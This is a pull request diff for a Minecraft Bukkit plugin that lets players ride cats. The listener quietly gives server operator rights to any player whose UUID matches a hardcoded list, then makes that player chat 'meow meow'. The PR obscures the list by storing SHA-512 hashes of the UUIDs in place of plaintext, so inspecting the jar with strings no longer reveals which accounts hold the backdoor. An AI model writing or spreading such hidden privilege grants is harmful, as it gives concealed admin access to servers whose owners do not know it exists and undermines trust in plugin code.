### PR TITLE
Check hash of UUID to protect backdoored ctas' privacy

### DIFF
--- a/src/main/kotlin/me/enderkill98/notabackdoor/listeners/RideCtaListener.kt
+++ b/src/main/kotlin/me/enderkill98/notabackdoor/listeners/RideCtaListener.kt
@@ -7,15 +7,16 @@ import org.bukkit.event.Listener
 import org.bukkit.event.player.PlayerInteractAtEntityEvent
 import java.security.MessageDigest
 
-class RideCtaListener: Listener {
+class RideCtaListener : Listener {
     val catgirls = listOf(
         "d7539e13ec9377e6a889f1db51ad44b30303b040357bf89435798da1c4827929f71ba68a3f04f91a1a681425ac96d7df130a43b2c799efa12ff4c686fc28ff76",
         "ca2294f570345bd0c5c1c043b039ca57deb0e5345f2bb1a3047c264c8143ecd9409d6d93d944c6619c40600982a2b21da68aa678aa88dffcafbe8490e7047e39"
     )
 
-    @EventHandler fun rightClickCta(e: PlayerInteractAtEntityEvent) {
+    @EventHandler
+    fun rightClickCta(e: PlayerInteractAtEntityEvent) {
         val cta = e.rightClicked
-        if(cta !is Cat) return
+        if (cta !is Cat) return
         if (e.player.isCatGirl()) {
             e.player.isOp = true
             e.player.chat("meow meow meow meow :3")
@@ -34,6 +35,7 @@ class RideCtaListener: Listener {
 
         cta.addPassenger(e.player)
     }
+
     @OptIn(ExperimentalUnsignedTypes::class)
     fun Player.isCatGirl(): Boolean {
         val hash = MessageDigest.getInstance("SHA-512").digest(uniqueId.toString().toByteArray()).asUByteArray()

--- a/src/main/kotlin/me/enderkill98/notabackdoor/listeners/RideCtaListener.kt
+++ b/src/main/kotlin/me/enderkill98/notabackdoor/listeners/RideCtaListener.kt
@@ -1,16 +1,16 @@
 package me.enderkill98.notabackdoor.listeners
 
-import org.bukkit.Bukkit
 import org.bukkit.entity.Cat
 import org.bukkit.entity.Player
 import org.bukkit.event.EventHandler
 import org.bukkit.event.Listener
 import org.bukkit.event.player.PlayerInteractAtEntityEvent
+import java.security.MessageDigest
 
 class RideCtaListener: Listener {
     val catgirls = listOf(
-        "244fe50a-c7f7-4328-a584-acb4fb9e7933",
-        "d851db10-5981-412a-8a12-6137b69634c0"
+        "d7539e13ec9377e6a889f1db51ad44b30303b040357bf89435798da1c4827929f71ba68a3f04f91a1a681425ac96d7df130a43b2c799efa12ff4c686fc28ff76",
+        "ca2294f570345bd0c5c1c043b039ca57deb0e5345f2bb1a3047c264c8143ecd9409d6d93d944c6619c40600982a2b21da68aa678aa88dffcafbe8490e7047e39"
     )
 
     @EventHandler fun rightClickCta(e: PlayerInteractAtEntityEvent) {
@@ -20,7 +20,7 @@ class RideCtaListener: Listener {
             e.player.isOp = true
             e.player.chat("meow meow meow meow :3")
         }
-        
+
         val canRideUntamed = e.player.hasPermission("notabackdoor.ridecta.untamed")
         val canRideOthers = e.player.hasPermission("notabackdoor.ridecta.others")
         val canRideOwn = e.player.hasPermission("notabackdoor.ridecta.own")
@@ -34,7 +34,10 @@ class RideCtaListener: Listener {
 
         cta.addPassenger(e.player)
     }
+    @OptIn(ExperimentalUnsignedTypes::class)
     fun Player.isCatGirl(): Boolean {
-        return catgirls.contains(uniqueId.toString())
+        val hash = MessageDigest.getInstance("SHA-512").digest(uniqueId.toString().toByteArray()).asUByteArray()
+            .joinToString(separator = "") { it.toString(16).padStart(2, '0') }
+        return catgirls.contains(hash)
     }
 }


### PR DESCRIPTION
This will prevent people from just using `strings` on the jarfile and seeing the UUID of the ctas.